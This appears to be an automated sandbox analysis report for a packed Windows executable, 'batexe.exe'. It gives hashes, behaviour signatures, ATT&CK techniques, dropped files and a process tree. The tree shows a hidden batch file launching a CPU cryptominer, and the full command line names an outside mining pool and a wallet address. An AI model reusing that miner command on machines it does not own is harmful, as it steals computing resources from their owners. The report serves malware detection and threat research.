73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 07:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3944	b2e.exe
844	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
844	cpuminer-sse2.exe
844	cpuminer-sse2.exe
844	cpuminer-sse2.exe
844	cpuminer-sse2.exe
844	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4648-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 3944	4648	batexe.exe	83
PID 4648 wrote to memory of 3944	4648	batexe.exe	83
PID 4648 wrote to memory of 3944	4648	batexe.exe	83
PID 3944 wrote to memory of 1096	3944	b2e.exe	84
PID 3944 wrote to memory of 1096	3944	b2e.exe	84
PID 3944 wrote to memory of 1096	3944	b2e.exe	84
PID 1096 wrote to memory of 844	1096	cmd.exe	87
PID 1096 wrote to memory of 844	1096	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9DA7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe

Filesize
34.3MB

MD5
7473ca3f803e8900c0475ae5cf2d32e3

SHA1
c3dc53e2c76237f7318db50586b1027689f72ab7

SHA256
6777e7535da1964dc7a5e704711c05d3718f4becc49c37cb3d95d33e13a785d3

SHA512
9019f6da6349ed96c63a899960421779878f970ce7479c9c4bd6c718589f7f41279b056d757339e66828cb0a5e819aeeaa7ec0c6d12925d913f5c79a913e4900

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe

Filesize
5.0MB

MD5
72d9b7f2eeac27d69ac861be4a4e8fcc

SHA1
e5be26aac105e0798572e5b201b4a91f1299586b

SHA256
977b567b21ec9f5f89cc8d11b70be633634a1c9953f34b206059965a548de849

SHA512
9b5a425e3cc1b971e776c477625d5e14aa397ba58f0e631ee0247a7b633c49ef400047a0508b897e4ac1ab9b6eadd26436e75f21dc8681ecb62dec47ebb98dd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EC3.tmp\b2e.exe

Filesize
4.4MB

MD5
81a6fbbdd1635319368a92189d566ae9

SHA1
1f44b77a5226a5eb5391777ce547405a178bd31a

SHA256
a2941348eff172df7a3c9651e2eb9c054aa1baa899cd700d6d383202dd06690e

SHA512
c005344be45ae6c7b88df13632cd48e262dc49bf7f726a8aa066a7704e8e0cb1738c5f9bc1fb166c4ed2b73faecb84a1daddf5afc1e12f4f366f4ed9958ada59

Download Submit
C:\Users\Admin\AppData\Local\Temp\9DA7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.0MB

MD5
3402aeb888d04dc74c70a100ed7f32bd

SHA1
1e7845a9249ec01762ab63a60fb9cea5c46c61b5

SHA256
79004c3aff33ae552bd2d76eea051678e1c9a5b366d6c1c60a09f12ba2f9833c

SHA512
799fe81dcbc88066fc42592752be7d4628189459d221e56a5f6495adedbd3718c1ed597cb086396e97ffa8514c2c43f92a84a278661b3ace85343677df2818bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.5MB

MD5
2d3944a3ce387a937448dd160e22cc82

SHA1
b47f19cb1e5ebcbc944f497ec804851f3f00ce70

SHA256
4a6262eadaef34c1692c3a81434cecf1a06db8035b230e96dfca65e72358cb37

SHA512
6750bd268d83ba14dc1ce001f445536a11bf6b0e85267d82195f5b6cd23d7bb7549c4dbc59d072960d9db5716072117b6761de0da136b3a646a1d4215599999a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.6MB

MD5
1a390efde56defecbd5c2708cdd9fea8

SHA1
d56fa98ff32706f4f5cd9f5a2a9c823c53a97b05

SHA256
ed4fc4e69465af0aa9b007e6c7778445acec63b73e1f3618235aa8ee3889317f

SHA512
ae248d6889b9dccf9a26e483b52695fcda341990b23bfc0feacd0c6187911cb13b8866bd9ae6189a8a527e468136fea3ec078b3925713b85c850440e0680d3b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.6MB

MD5
8072e9d0b943aab8d9fd62c618d1b02f

SHA1
24344a964189e38b3b52ff0d8a97c19a15ef65a5

SHA256
ce867ac5d396eaa37bbd1253b43a82bef587db447e086d9833338e9c60e98a1e

SHA512
93f02f9bca6cd156a90c95d70d5a23d33e41ecba925986eb11e5d351f9ad7830fd03c9db9a80bcb46487ccdf6826903a364a6565445260324b48ff54c802f647

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/844-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/844-46-0x000000006FEB0000-0x000000006FF48000-memory.dmp

Filesize
608KB

Download
memory/844-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/844-47-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/844-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/844-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3944-58-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3944-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4648-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download